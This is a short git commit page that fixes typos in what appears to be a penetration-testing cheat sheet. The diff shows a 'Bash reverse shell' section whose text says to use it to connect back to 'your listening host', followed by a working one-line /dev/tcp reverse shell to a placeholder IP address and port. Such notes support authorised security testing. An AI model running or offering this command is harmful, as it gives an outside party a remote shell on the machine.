typo correction

This commit is contained in:
David Busby 2014-06-06 16:27:11 +01:00
parent 2ed0048a28
commit c71945966f

View File

@ -114,7 +114,8 @@ cat /proc/cpuinfo
```
**Bash reverse shell** (@icleus)
Works on all distrobutions where egress filtering is not in place / quiet open, use this to reverse connect to your lsitening host.
Works on all (recent) distrobutions where egress filtering is not in place / quite open, use this to reverse connect to your listening host.
```bash
bash -i>& /dev/tcp/123.123.123.123/1234 0>&1 &